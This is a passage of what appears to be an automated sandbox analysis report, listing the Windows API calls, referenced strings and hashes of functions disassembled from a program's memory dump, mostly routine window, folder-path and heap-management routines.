CreateWindowExW.USER32(00000000,BUTTON,00413080,50010001,0000006E,00000043,00000050,00000019,00000000,000003E8,00000000), ref: 004091CD
SendMessageW.USER32(00000000,00000030,00000001), ref: 004091DF
CreateAcceleratorTableW.USER32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409216
SetForegroundWindow.USER32(00000000), ref: 0040921F
BringWindowToTop.USER32(00000000), ref: 00409226
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00409239
TranslateAcceleratorW.USER32(00000000,00000000,?), ref: 0040924A
TranslateMessage.USER32(?), ref: 00409259
DispatchMessageW.USER32(?), ref: 00409264
DestroyAcceleratorTable.USER32(00000000), ref: 00409278
wcslen.MSVCRT ref: 00409289
wcscpy.MSVCRT ref: 004092A1
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004092B4

Strings

STATIC, xrefs: 004090FB
BUTTON, xrefs: 004091C6
0, xrefs: 00408FC5
EDIT, xrefs: 0040914D
D0A, xrefs: 00409003

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: Window$Message$CreateSend$wcslen$Accelerator$HeapLoadMetricsSystemTableTranslatewcscpy$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundFreeIconLongObjectRegisterStock
String ID: 0$BUTTON$D0A$EDIT$STATIC
API String ID: 54849019-2968808370
Opcode ID: 64b7048e9784f6b3a965978878b2fb0e8fb718a1bb0b3c0aee67433a202d6ab7
Instruction ID: ac9e317f2143d035474ccc6d8eb2369134aae38ec411cec841dcb6eceac04435
Opcode Fuzzy Hash: 64b7048e9784f6b3a965978878b2fb0e8fb718a1bb0b3c0aee67433a202d6ab7
Instruction Fuzzy Hash: FC919071548300BFE7219F65DD49F9B7BE9EB48B50F00483EFA84A61E1CBB988408B5D

Function 00401511 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 335fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,00000000,?,?,00000000,?), ref: 00401648

Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B

Part of subcall function 004057F0: wcsncmp.MSVCRT ref: 00405853
Part of subcall function 004057F0: memmove.MSVCRT(00000000,00000000,?,00000000,00000000,?,?,-0000012C,?,?,00402252,00000000,00000002,00000000,00000000,00417024), ref: 004058E1
Part of subcall function 004057F0: wcsncpy.MSVCRT ref: 004058F9

Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02130000,00000000,?), ref: 0040E599

Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(02130000,00000000,?,?), ref: 0040E5BC

Part of subcall function 0040AD45: wcsncpy.MSVCRT ref: 0040AD63
Part of subcall function 0040AD45: wcslen.MSVCRT ref: 0040AD75
Part of subcall function 0040AD45: CreateDirectoryW.KERNELBASE(?,00000000), ref: 0040ADB5

Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7

Strings

2pA, xrefs: 00401704
6pA, xrefs: 004017DE
2pA, xrefs: 004016D6
\pA, xrefs: 004015A1, 004015D8, 004015E2, 004015F4, 004015DC, 004015E6, 004015EE, 004015F8
6pA, xrefs: 00401795
.pA, xrefs: 0040168D
$pA, xrefs: 00401656
\pA, xrefs: 0040159B
\pA, xrefs: 00401908
6pA, xrefs: 00401872
\pA, xrefs: 00401846
&pA, xrefs: 00401560
2pA, xrefs: 004016AC
\pA, xrefs: 004015FE

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: AllocateErrorHeapLastValuewcslenwcsncpy$CreateDirectoryFileWritememmovewcsncmp
String ID: $pA$&pA$.pA$2pA$2pA$2pA$6pA$6pA$6pA$\pA$\pA$\pA$\pA$\pA
API String ID: 1295435411-2952853158
Opcode ID: af3dae6db891e923df4a4e706107fb4aaecf548916866d68cba43d12f02d6bed
Instruction ID: 61c24dd49085b80bd1b70adcfbfbd818be60928fccba90bb55e88b0b877bbf77
Opcode Fuzzy Hash: af3dae6db891e923df4a4e706107fb4aaecf548916866d68cba43d12f02d6bed
Instruction Fuzzy Hash: AEB11FB1104304BED600BB62DD8297F77A9EB88708F50CD3FB144A61E2EA3DDD55962E

Function 00409355 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 116libraryloaderCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00409373

Part of subcall function 0040EA90: TlsGetValue.KERNEL32(0000000D,\\?\,?,004096ED,00000104,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 0040EA9A

memset.MSVCRT ref: 00409381
LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
wcsncpy.MSVCRT ref: 004093DD
wcslen.MSVCRT ref: 004093F1
CoTaskMemFree.OLE32(?), ref: 0040947A
wcslen.MSVCRT ref: 00409481
FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0

Strings

SHBrowseForFolderW, xrefs: 004093AA
SHELL32.DLL, xrefs: 00409389
P, xrefs: 00409429
SHGetPathFromIDListW, xrefs: 004093B2
$0A, xrefs: 004093CD

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskValuememsetwcsncpy
String ID: $0A$P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
API String ID: 4193992262-92458654
Opcode ID: cbde42508be9eaa54418296cf2fcec228ecaff496ce27a8586192ba66c484795
Instruction ID: dd14e0d5c7aaf6d086be5bb491997024bece532a8fadf3e5f1c49f9ab44bf52d
Opcode Fuzzy Hash: cbde42508be9eaa54418296cf2fcec228ecaff496ce27a8586192ba66c484795
Instruction Fuzzy Hash: 43414471508304AAC720EF759C49A9FBBE8EF88714F004C3FF945E3292D77899458B5A

Function 00406310 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 275COMMON

Download Yara Rule

APIs

wcsncpy.MSVCRT ref: 00406405

Part of subcall function 0040E880: TlsGetValue.KERNEL32(0000000D,?,?,00405EC5,00001000,00001000,?,?,00001000,00402F92,00000000,00000008,00000001,00000000,00000000,00000000), ref: 0040E88A

_wcsdup.MSVCRT ref: 0040644E
_wcsdup.MSVCRT ref: 00406469
_wcsdup.MSVCRT ref: 0040648C
wcsncpy.MSVCRT ref: 00406578
free.MSVCRT ref: 004065DC
free.MSVCRT ref: 004065EF
free.MSVCRT ref: 00406602
wcsncpy.MSVCRT ref: 0040662E

Strings

$0A, xrefs: 0040632F
$0A, xrefs: 0040633E
$0A, xrefs: 0040631F

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: _wcsdupfreewcsncpy$Value
String ID: $0A$$0A$$0A
API String ID: 1554701960-360074770
Opcode ID: f59d57380f8462386650d730b526675ad7e9bff01cb308e942a75ae948ec079d
Instruction ID: 8dd6decbfdfb2e9f9ed0212bb19f765ed94392260ea2aa670051c2f9137328dc
Opcode Fuzzy Hash: f59d57380f8462386650d730b526675ad7e9bff01cb308e942a75ae948ec079d
Instruction Fuzzy Hash: 27A1BD715043019BCB209F18C881A2BB7F1EF94348F49493EFC8667391E77AD965CB9A

Function 0040AEBA Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 91libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0040E900: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E90C
Part of subcall function 0040E900: HeapReAlloc.KERNEL32(02130000,00000000,?,?), ref: 0040E967

LoadLibraryW.KERNEL32(Shell32.DLL,00000104,?,?,?,?,00000009,0040373D,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0040AEE3
GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 0040AEF5
wcscpy.MSVCRT ref: 0040AF1B
wcscat.MSVCRT ref: 0040AF26
wcslen.MSVCRT ref: 0040AF2C
CoTaskMemFree.OLE32(?,00000000,00000000,?,02139760,00000000,00000000), ref: 0040AF3A
FreeLibrary.KERNEL32(00000000,?,?,?,00000009,0040373D,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,00404746,00000000), ref: 0040AF41
wcscat.MSVCRT ref: 0040AF59
wcslen.MSVCRT ref: 0040AF5F

Strings

Shell32.DLL, xrefs: 0040AEDE
SHGetKnownFolderPath, xrefs: 0040AEEF
Downloads\, xrefs: 0040AF53

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: FreeLibrarywcscatwcslen$AddressAllocHeapLoadProcTaskValuewcscpy
String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
API String ID: 1740785346-287042676
Opcode ID: 3b5950ac527df3ef7cda72db0df74ea4b6227c4cc24e67ecc582cb497ed06186
Instruction ID: 692465ff5638a5220195cb25a460cc83d5c0d74b8cd54d9d2378aa313f557f39
Opcode Fuzzy Hash: 3b5950ac527df3ef7cda72db0df74ea4b6227c4cc24e67ecc582cb497ed06186
Instruction Fuzzy Hash: 59210DB12483037AC121A7629C4AF6B3968DB51B95F10043FF505B51C1DABCC96195AF

Function 00412722 Relevance: 19.6, APIs: 13, Instructions: 74memoryregistrythreadCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000), ref: 00412732
InitializeCriticalSection.KERNEL32(004186E8,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000), ref: 0041273E
TlsGetValue.KERNEL32(?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000), ref: 00412754
HeapAlloc.KERNEL32(00000008,00000014,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 0041276E
EnterCriticalSection.KERNEL32(004186E8,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000), ref: 0041277F
LeaveCriticalSection.KERNEL32(004186E8,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 0041279B
GetCurrentProcess.KERNEL32(00000000,00100000,00000000,00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000), ref: 004127B4
GetCurrentThread.KERNEL32 ref: 004127B7
GetCurrentProcess.KERNEL32(00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127BE
DuplicateHandle.KERNEL32(00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127C1
RegisterWaitForSingleObject.KERNEL32(0000000C,00000000,0041281A,00000000,000000FF,00000008), ref: 004127D7
TlsSetValue.KERNEL32(00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127E4
HeapAlloc.KERNEL32(00000000,0000000C,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127F5

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
String ID:
API String ID: 298514914-0
Opcode ID: 2e736260770be91d420535d1c957e5431970d5774848fb61a6feb3a44565c38a
Instruction ID: 7332ff317071e0a972604479ba3dd7ff9d073507a24f1d64326450f2c9127e0c
Opcode Fuzzy Hash: 2e736260770be91d420535d1c957e5431970d5774848fb61a6feb3a44565c38a
Instruction Fuzzy Hash: 36210770644301BFDB119F60ED88B967FB9FB08761F14C43AF505A62A1CBB49850CB68

Function 00403221 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 176COMMON

Download Yara Rule

APIs

GetWindowsDirectoryW.KERNEL32(00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 004032AE
PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 004032B7
GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 004033D7
PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004033E0

Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(02130000,00000000,?,?), ref: 0040E5BC

PathAddBackslashW.SHLWAPI(00000000,00000000,sysnative,00000000,00000000,00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 004032E7

Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B

Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02130000,00000000,?), ref: 0040E599

GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 00403414
PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040341D

Strings

sysnative, xrefs: 004032CE, 004032D3

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: BackslashPath$Directory$AllocateErrorHeapLastSystemValue$Windows
String ID: sysnative
API String ID: 3406704365-821172135
Opcode ID: 06246fb3350c889958c456c83ddef363d069b28f08760247f4de7035fd8ff5d7
Instruction ID: e6855e8cc6b59ba75e59fbb34a632fbdfc5c60153de78cbca022c055a9fde60a
Opcode Fuzzy Hash: 06246fb3350c889958c456c83ddef363d069b28f08760247f4de7035fd8ff5d7
Instruction Fuzzy Hash: 83510A75118201BAD600BBB3DC82E3F66A9EB8075CF10CC3EB144751E2EA3DD9655A6E

Function 0040E0C3 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 53librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Kernel32.dll,00000000,00000000,00000000,00000004,00000000,0040DED5,0041867C,0040E062,00000000,FFFFFFED,00000200,76ED5E70,0040A4F6,FFFFFFED,00000010), ref: 0040E0D1
GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0040E0E6
FreeLibrary.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040E101
InterlockedCompareExchange.KERNEL32(00000000,00000001,00000000), ref: 0040E110
Sleep.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040E122
InterlockedExchange.KERNEL32(00000000,00000002), ref: 0040E135

Strings

Kernel32.dll, xrefs: 0040E0CA
InitOnceExecuteOnce, xrefs: 0040E0E0

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: ExchangeInterlockedLibrary$AddressCompareFreeLoadProcSleep
String ID: InitOnceExecuteOnce$Kernel32.dll
API String ID: 2918862794-1339284965
Opcode ID: 5ce0d2485c1bb4decbbcb922162a80cd5c7d15fe9eeb9708d5254b12b909fa63
Instruction ID: f1debd77009d833240bff916e076c3bff8506a5db62120b34ae0b3aef6ef2b9b
Opcode Fuzzy Hash: 5ce0d2485c1bb4decbbcb922162a80cd5c7d15fe9eeb9708d5254b12b909fa63
Instruction Fuzzy Hash: 3001D431244214FBD6201FA2DC4DFEB7B79EB45B52F10883AF501B51C0EAB85D21C66D

Function 00409507 Relevance: 12.0, APIs: 8, Instructions: 50threadwindowCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(?,00000000), ref: 00409511
GetCurrentThreadId.KERNEL32 ref: 0040951F
IsWindowVisible.USER32(?), ref: 00409526

Part of subcall function 0040E1F2: HeapAlloc.KERNEL32(00000008,00000000,0040DA6C,00418670,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040E1FE

GetCurrentThreadId.KERNEL32 ref: 00409543
GetWindowLongW.USER32(?,000000EC), ref: 00409550
GetForegroundWindow.USER32 ref: 0040955E
IsWindowEnabled.USER32(?), ref: 00409569
EnableWindow.USER32(?,00000000), ref: 00409579

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
String ID:
API String ID: 3383493704-0
Opcode ID: 68a633d90a34132dfb5e2fdbc66a21f5e6654eddc9afd13cb677bbd48b54e552
Instruction ID: 39f81579f69f96c849a8792b8e2bccb0372a8aae8c011f207204c0ba92c0e649
Opcode Fuzzy Hash: 68a633d90a34132dfb5e2fdbc66a21f5e6654eddc9afd13cb677bbd48b54e552
Instruction Fuzzy Hash: 2E01DD321083016FD3219B7ADC88AABBBF8AF51760B04803EF446D3291D7748C40C66D

Function 00408EB4 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?), ref: 00408EED
GetWindowLongW.USER32(?,000000EB), ref: 00408EFC
GetWindowTextLengthW.USER32 ref: 00408F0A
HeapAlloc.KERNEL32(00000000), ref: 00408F1F
GetWindowTextW.USER32(00000000,00000001), ref: 00408F2F
DestroyWindow.USER32(?), ref: 00408F3D
UnregisterClassW.USER32 ref: 00408F53

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: Window$DestroyText$AllocClassHeapLengthLongUnregister
String ID:
API String ID: 2895088630-0
Opcode ID: 95d800774705508cbc5b0801488b835211eb90fc9c6ab37156a63b4f6fedfd03
Instruction ID: 1940c3daec6268f5e5453f2abd6c11195bb238337c9a47dace4bef07d760dbb1
Opcode Fuzzy Hash: 95d800774705508cbc5b0801488b835211eb90fc9c6ab37156a63b4f6fedfd03
Instruction Fuzzy Hash: 9011FA3110821AFFCB115F64ED4C9E63F76EB18365B10C17AF845A2AB0CF359951EB58

Function 00409588 Relevance: 9.1, APIs: 6, Instructions: 68threadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(00409507,?), ref: 0040959B
GetCurrentThreadId.KERNEL32 ref: 004095B3
SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 004095CF
GetCurrentThreadId.KERNEL32 ref: 004095EF
EnableWindow.USER32(?,00000001), ref: 00409605
SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 0040961C

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: Window$CurrentThread$EnableEnumWindows
String ID:
API String ID: 2527101397-0
Opcode ID: 63874de7abb22210dce27e7498091370d04ccb8537cec92ca55daa4cf010ce04
Instruction ID: 1b506e7c949c81e82e84a7d7bfb29e48a0d3001387cd43cbe5fa1ceb5ac7c4b4
Opcode Fuzzy Hash: 63874de7abb22210dce27e7498091370d04ccb8537cec92ca55daa4cf010ce04
Instruction Fuzzy Hash: D211D032149741BBD7324F16EC48F57BBB9EB81B20F148A3EF065226E1DB766C44CA18

Function 0040D9D3 Relevance: 9.1, APIs: 6, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D9F8
HeapAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA0C
TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA19
TlsGetValue.KERNEL32(00000010,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA30
HeapReAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA3F
TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA4E

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: AllocValue$Heap
String ID:
API String ID: 2472784365-0
Opcode ID: 7f6b70932fc1a08cda45a5a13933a08f33854a1b42fa358b63a86d14e57a1294
Instruction ID: 2e0cfeba47cec0f6b91efb2e93d625c98a83c07df354da5318bce0fb1280086a
Opcode Fuzzy Hash: 7f6b70932fc1a08cda45a5a13933a08f33854a1b42fa358b63a86d14e57a1294
Instruction Fuzzy Hash: 1C118676A45310AFD7109FA5EC44AA67FA9EB18760B05813EF904D7370DA359C44CBAC

Function 004126A4 Relevance: 9.0, APIs: 6, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

UnregisterWait.KERNEL32(?), ref: 004126AE
CloseHandle.KERNEL32(?,?,?,?,0041282A,?), ref: 004126B7
EnterCriticalSection.KERNEL32(004186E8,?,?,?,0041282A,?), ref: 004126C3
LeaveCriticalSection.KERNEL32(004186E8,?,?,?,0041282A,?), ref: 004126E8
HeapFree.KERNEL32(00000000,00000000,?,?,?,0041282A,?), ref: 00412706
HeapFree.KERNEL32(?,?,?,?,?,0041282A,?), ref: 00412718

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: CriticalFreeHeapSection$CloseEnterHandleLeaveUnregisterWait
String ID:
API String ID: 4204870694-0
